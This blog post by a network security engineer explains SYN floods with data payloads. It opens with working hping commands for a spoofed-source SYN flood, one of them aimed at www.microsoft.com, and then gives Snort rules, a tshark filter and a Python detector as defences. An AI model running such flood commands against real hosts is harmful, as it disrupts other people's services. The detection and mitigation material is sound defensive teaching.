The switches for this type of attack are simple:
hping -a "insertmyspoofaddress" -S -d 500 -p 80 -i em0 1.1.1.1
The above tells hping to conduct a SYN flood ( -S ), set the data payload size to 500 bytes ( -d 500 ), and use a spoofed source address ( -a ) against the target host 1.1.1.1 on port 80.
I could have also used random spoofed source addresses, which is more typical for this type of attack:
hping --rand-source -S -d 500 -p 80 -i em0 www.microsoft.com
( yes I hate windows :) )
NOTE: You will need super-user (root) privileges on the attacking host, due to the permissions with opening ports greater than 1024, or you will get the following errors:
$ hping -a -S -d 500 -p 80 -i em0 1.1.1.1
[open_sockraw] socket(): Permission denied
[main] can't open
Okay, simple. Now why would one do this?
Easily: to exhaust services on a host, and because most firewalls will allow this type of traffic through unchallenged. Because of this gap, with no mitigation or alerting device in place, you are susceptible to a simple L4 attack. The data payload attached to this attack could also flood the target destination and cause issues within the attacked network's monitoring systems.
This type of attack is not as effective when a CDN or SLB is in place, since these systems distribute the traffic amongst all available servers at that edge server (CDN) or all active and up real servers mapped on the SLB, thus reducing the impact compared with all of it landing on one host IP address.
To mitigate this attack you have a choice of options, but the easiest is to apply a filter that says: if any SYN packet, or even a SYN-ACK, arrives with a payload, drop the datagram. You can do this on most firewalls, or better yet on an IDS/IPS system.
e.g.
# kfelix snort rules LOCATION SEATTLE
var INTERNALNET01 217.x.x.0/24
var HTTP 80
var HTTPS 443
var MAIL 25
var POP 110
var EXTERNAL_NET !$INTERNALNET01
# dsize:>0 matches any packet carrying a TCP payload; ",12" after the flags
# ignores the two reserved (ECN) bits so an ECN-setup SYN still matches.
# sid values are local rule ids (>= 1000000); every rule needs a sid and rev.
alert tcp $EXTERNAL_NET any -> $INTERNALNET01 any ( flags:S,12; dsize:>0; msg:"SYN with data"; sid:1000001; rev:1;)
alert tcp $EXTERNAL_NET any -> $INTERNALNET01 any ( flags:SA,12; dsize:>0; msg:"SYN ACK with data"; sid:1000002; rev:1;)
So now we have some type of protection from SYN flood attacks, alerting on SYN or SYN-ACK floods whenever a data payload is present. I would use a Snort rule checker like porcus to validate the rules before submitting and loading them. But the above will give you a basic idea of how to alert on packets of this nature.
You could do the same for any FIN and FIN-ACK datagrams.
Now, to detect this, you can use Wireshark or tshark to monitor. The capture filter tcp[13]==2 selects packets whose TCP flags byte is exactly SYN, and the display filter tcp.len > 0 keeps only those carrying a payload (current tshark takes the display filter with -Y; older releases used -R):
tshark -n -i eth1 -f 'tcp[13]==2' -Y 'tcp.len > 0'
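As an added example that is not part of Ken Felix's post, the Python script below applies the same test as the Snort rules and the tshark filter above to raw IPv4/TCP packets: it parses the IP and TCP headers, reads the flags byte (the tcp[13] of the capture filter) and computes the payload length (tshark's tcp.len), and reports any SYN, SYN-ACK, FIN or FIN-ACK segment that carries data. It goes a little beyond the post's filter by covering the FIN cases the post says could be handled the same way and by ignoring the ECN bits in the flags byte. The packets, addresses and ports are constructed inline for the demonstration and are not real captures.

```python
"""Added example: detect SYN/SYN-ACK/FIN/FIN-ACK segments that carry a payload.

Not code from the original post. Packets are built in memory only; the
addresses (10.0.0.x, 192.0.2.10) and ports are constructed placeholders.
"""
import struct
from typing import List, Optional, Tuple

FIN, SYN, ACK = 0x01, 0x02, 0x10

# Flag combinations to alert on: the two Snort rules from the post (S, SA)
# plus the FIN variants the post says could be handled the same way.
SUSPECT_FLAGS = {
    SYN: "SYN with data",
    SYN | ACK: "SYN ACK with data",
    FIN: "FIN with data",
    FIN | ACK: "FIN ACK with data",
}

Hit = Tuple[str, str, int, int, str, int]  # src, dst, sport, dport, msg, payload_len


def build_packet(src: str, dst: str, sport: int, dport: int,
                 flags: int, payload: bytes) -> bytes:
    """Constructed IPv4 + TCP packet (no options; checksums left zero)."""
    # TCP header: sport, dport, seq, ack, data offset (5 words), flags, window, csum, urg
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)
    total_len = 20 + len(tcp_hdr) + len(payload)
    # IPv4 header: ver/ihl, tos, total length, id, frag, ttl, proto=6 (TCP), csum, src, dst
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                         bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return ip_hdr + tcp_hdr + payload


def inspect(packet: bytes) -> Optional[Hit]:
    """Return a hit tuple if the packet is a suspect segment with data, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    if packet[9] != 6 or total_len > len(packet) or ihl + 20 > total_len:
        return None  # not TCP, truncated, or no room for a TCP header
    src = ".".join(map(str, packet[12:16]))
    dst = ".".join(map(str, packet[16:20]))
    tcp = packet[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4
    if data_offset < 20 or data_offset > len(tcp):
        return None
    # Same byte as tcp[13] in the tshark capture filter; mask off CWR/ECE so an
    # ECN-setup SYN (SYN+ECE+CWR) is still treated as a SYN.
    flags = tcp[13] & 0x3F
    payload_len = len(tcp) - data_offset  # equals tshark's tcp.len
    msg = SUSPECT_FLAGS.get(flags)
    if msg is None or payload_len == 0:
        return None
    return (src, dst, sport, dport, msg, payload_len)


def scan(packets: List[bytes]) -> List[Hit]:
    """Run inspect() over a list of packets and keep the hits."""
    return [hit for hit in map(inspect, packets) if hit is not None]


# Constructed sample traffic: one normal handshake SYN, one SYN carrying 500
# bytes (as in the post's hping command), a SYN-ACK with data, an ordinary
# ACK carrying an HTTP request, and a FIN-ACK with data.
SAMPLE_PACKETS = [
    build_packet("10.0.0.1", "192.0.2.10", 40000, 80, SYN, b""),
    build_packet("10.0.0.2", "192.0.2.10", 40001, 80, SYN, b"A" * 500),
    build_packet("192.0.2.10", "10.0.0.3", 80, 40002, SYN | ACK, b"B" * 64),
    build_packet("10.0.0.4", "192.0.2.10", 40003, 80, ACK, b"GET / HTTP/1.0\r\n\r\n"),
    build_packet("10.0.0.5", "192.0.2.10", 40004, 80, FIN | ACK, b"tail"),
]

if __name__ == "__main__":
    for src, dst, sport, dport, msg, n in scan(SAMPLE_PACKETS):
        print(f"{msg}: {src}:{sport} -> {dst}:{dport} payload={n} bytes")
```

Only the three segments that combine a SYN/FIN flag with a payload are reported; the ordinary handshake SYN and the ACK carrying the HTTP request pass silently, which is the same split the Snort rules make with flags plus dsize.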
I hope you found this post helpful, & happy packet forging
Ken Felix
Freelance Network Security Engineer
kfelix at hyperfeed dot com